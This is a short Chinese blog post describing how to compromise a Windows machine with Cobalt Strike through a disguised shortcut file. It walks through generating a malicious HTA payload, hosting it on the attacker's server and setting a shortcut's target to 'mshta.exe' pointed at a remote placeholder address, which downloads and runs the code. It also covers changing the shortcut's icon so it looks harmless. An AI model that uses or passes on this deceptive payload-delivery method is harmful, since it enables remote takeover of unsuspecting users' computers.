当前位置:网站首页>利用快捷方式-LNK-上线CS
利用快捷方式-LNK-上线CS
2022-07-06 06:24:00 【zxl2605】
步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装
这里会用到windows中的mshta,用于执行hta文件
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件
下面进行演示
打开已经配置好的CS
1、生成:Attacks -> Packages -> Html Application
选择设置的监听器-power shell
生成evil.hta
2、上传:Attacks——>Web Drive by——>Host file
复制生成的利用文件网址
3.创建快捷方式
4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5.伪装(自行拓展,不做演示)
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装(自行扩展)
点击快捷方式-快捷方式成功上线
边栏推荐
- D - How Many Answers Are Wrong
- 调用链监控Zipkin、sleuth搭建与整合
- MySQL5.72.msi安装失败
- 基于JEECG-BOOT的list页面的地址栏参数传递
- Delete the variables added to watch1 in keil MDK
- 国际经贸合同翻译 中译英怎样效果好
- Engineering organisms containing artificial metalloenzymes perform unnatural biosynthesis
- 金融德语翻译,北京专业的翻译公司
- 如何做好互联网金融的英语翻译
- Still worrying about how to write web automation test cases? Senior test engineers teach you selenium test case writing hand in hand
猜你喜欢
随机推荐
Remember the implementation of a relatively complex addition, deletion and modification function based on jeecg-boot
Isam2 and incrementalfixedlagsmooth instructions in gtsam
翻译影视剧字幕,这些特点务必要了解
Grouping convolution and DW convolution, residuals and inverted residuals, bottleneck and linearbottleneck
My daily learning records / learning methods
MySQL is sorted alphabetically
Testing of web interface elements
Summary of leetcode's dynamic programming 4
D - How Many Answers Are Wrong
Drug disease association prediction based on multi-scale heterogeneous network topology information and multiple attributes
Aike AI frontier promotion (2.13)
University of Manchester | dda3c: collaborative distributed deep reinforcement learning in swarm agent systems
Difference between backtracking and recursion
F - true liars (category and search set +dp)
Redis 核心技术与实战之 基本架构:一个键值数据库包含什么?
全链路压测:构建三大模型
生物医学英文合同翻译,关于词汇翻译的特点
浅谈专项测试之弱网络测试
[mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1
模拟卷Leetcode【普通】1219. 黄金矿工